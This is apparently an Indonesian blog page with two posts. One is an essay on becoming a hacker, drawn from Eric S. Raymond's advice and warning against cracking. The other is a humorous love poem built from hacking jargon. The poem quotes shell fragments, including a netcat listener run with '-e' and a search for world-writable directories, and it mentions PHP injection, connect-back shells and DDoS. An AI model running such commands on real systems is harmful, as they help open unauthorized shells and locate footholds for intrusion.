Dalam tulisan How to Become a Hacker, Eric Steven Raymon mengatakan bahwa menjadi hacker tidaklah segampang yang dikira. Langkah awal untuk menjadi seorang hacker haruslah menguasai minimal 5 bahasa pemrograman yang ada. Ia menyebut bahasa pemrograman C/C++, Java, Perl, Phyton & LISP. Selain itu mampu berinteraksi dengan program HTML untuk dapat membangun komunikasi dengan jaringan internet. Semua dasar diatas adalah ilmu yang "wajib" dimiliki jika kita memang berminat untuk menjadi seorang hacker sejati. Karena pada dasarnya menjadi Hacker adalah penguasaan terhadap membaca dan menulis kode.

Kenapa kode? Karena memang komputer yang kita jalankan setiap hari pada intinya adalah terdiri dari berbagai kode instruksi yang cukup rumit.

Selain penguasaan terhadap bahasa pemrograman diatas, kita pun harus punya bekal yang cukup dalam berbahasa inggris untuk dapat saling bertukar pikiran dengan komunitas hacker dari seluruh dunia. Ini tidak dilarang karena pada umumnya, mereka (anggota komunitas tersebut) memiliki kode etik tersendiri tentang open-source atau kode-kode program yang boleh dibuka dan diutak atik oleh orang lain. Contoh, kode-kode Linux yang marak di perkenalkan baru-baru ini memiliki konsep open source dan karenanya bisa dimiliki oleh khalayak ramai dengan sebutan free software.

Kembali pada persoalan diatas, menjadi seorang hacker untuk tujuan saling berbagi ilmu dalam teknologi informasi ini, atau dalam arti yang lebih luas untuk memudahkan pemakai komputer pada masa yang akan datang, bukanlah hal harus ditakuti. Sebaliknya, ilmu tersebut harus diterjemahkan dan sama-sama digali sehingga menjadi bagian terintegral dalam memahami lika-liku dunia cyber. Asal saja kita tidak terjebak pada prilaku yang negatif sehingga menjadi seorang cracker yang membobol sitem rahasia orang lain.

AWAL SEBUAH PERJUANGAN

Ketika kita meniatkan diri untuk lebih akrab dengan dunia hacker, maka selain beberapa bekal yang disebutkan diatas, penguasaan bahasa pemrograman, html dan bahasa inggris, nampaknya niat tersebut harus juga dilengkapi dengan satu sikap mendasar tentang orientasi dan tujuan awal kita menjadi seorang hacker. Alih-alih menjadi seorang pakar pemrograman yang baik, jika tidak benar malah bisa terjebak pada prilaku negativ yang tidak hanya merugikan orang lain tapi merugikan diri sendiri. Konon, jika seandainya saja anda menjadi seorang cracker dan anda dikenal suka membuka rahasia orang lain, maka, jangan harap anda dapat dengan mudah berjalan-jalan kemanca negara. Karena, kata beberapa sumber, nama anda sudah di "black list" sebagai penjahat cyber?

Di sisi ini menarik untuk di simak, satu sisi, kita butuh teknologi canggih yang kerap bermunculan dalam hitungan detik, sisi lain ada kehawatiran takut terjebak pada pola "nyeleneh" yang berakibat patal. Namun demikian, sebagai satu sikap, kita berpijak pada satu kesepakatan, bahwa mempelajari bahasa-bahasa yang ditawarkan oleh Eric Steven Raymon diatas, adalah hal yang baik. Karena dengan mempelajarinya, kita minimal dapat mendapat solusi untuk membuat program yang berguna bagi orang lain. Dan jika ini dilakukan, percayalah, anda adalah seorang hacker.
Read more

Puisi Cinta seorang Hacker

Sahabat, lagi-lagi saya nemu yang aneh-aneh di om Google
, niat hati mau cari puisi buat tugas sekolah, ehh dapet nih puisi,

Puisi dari Seorang hacker neh, romantis banget :X

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system,
ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system,
saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada malicious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system,
jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, …?

Tapi sayang hatimu bukanlah sebuah system,
kamu adalah sang bidadari impianku, yang telah mengacaukan systemku!
Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.

xixi, ternyata “Hacker” juga manusia yang punya perasaan yah.. khu-khu. Sayang aku bukan seorang hacker,
Read more